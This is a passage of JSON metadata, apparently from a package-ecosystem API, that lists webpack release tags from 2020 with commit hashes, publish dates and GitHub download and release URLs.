dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a